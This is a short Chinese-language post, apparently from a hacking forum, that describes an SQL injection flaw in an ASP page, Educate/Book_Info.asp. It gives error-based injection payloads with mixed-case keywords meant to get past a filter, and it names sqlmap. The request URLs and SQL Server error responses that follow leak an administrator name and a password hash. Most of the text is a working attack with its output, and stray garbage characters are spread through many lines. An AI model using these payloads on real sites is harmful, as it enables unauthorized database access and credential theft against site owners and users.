漏洞出现在Educate/Book_Info.asp
" h2 B& P1 J' S d! J
/ a8 n( L; [% U+ c. J# r* G此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出- A. l3 } _8 S/ f6 o
, `9 O. D* g7 Bexp:如下" i6 S1 f" e, j: j M
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% |: M* G; g- S2 v查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
) }$ t) e. z7 y: w5 o5 ?( x& c. ^9 t7 X 2 L4 }; y; W% f# t9 @& y1 e2 a
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). r2 T" V* J8 Q9 C8 }6 j7 P
) J: _% m( a9 v$ x- SMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'1 j# m8 g7 F1 `0 v) c% h- n! [
6 x7 ` J2 a1 {$ R) P- U* R, M将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
& Q! c* b9 D X6 V! j0 c9 x $ o. A- }% Q, V- v! a+ r
/Educate/Book_Info.asp,行 89 Z4 ` a& u/ M1 e: Q
6 x) a+ g/ F/ a$ _+ `
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 n( {% ^% I* @1 o0 y; w4 J + D+ b- E/ Z9 h+ J) B b1 r# V6 F
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'* G6 O( T+ f f8 [; b4 I
( G$ f) l' v# v4 T2 S: W& [
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。& E3 h3 s6 x. L/ g: f
1 k7 ?0 H' }. A9 p$ X% o% t/Educate/Book_Info.asp,行 8
8 }3 v& I. u3 k2 L |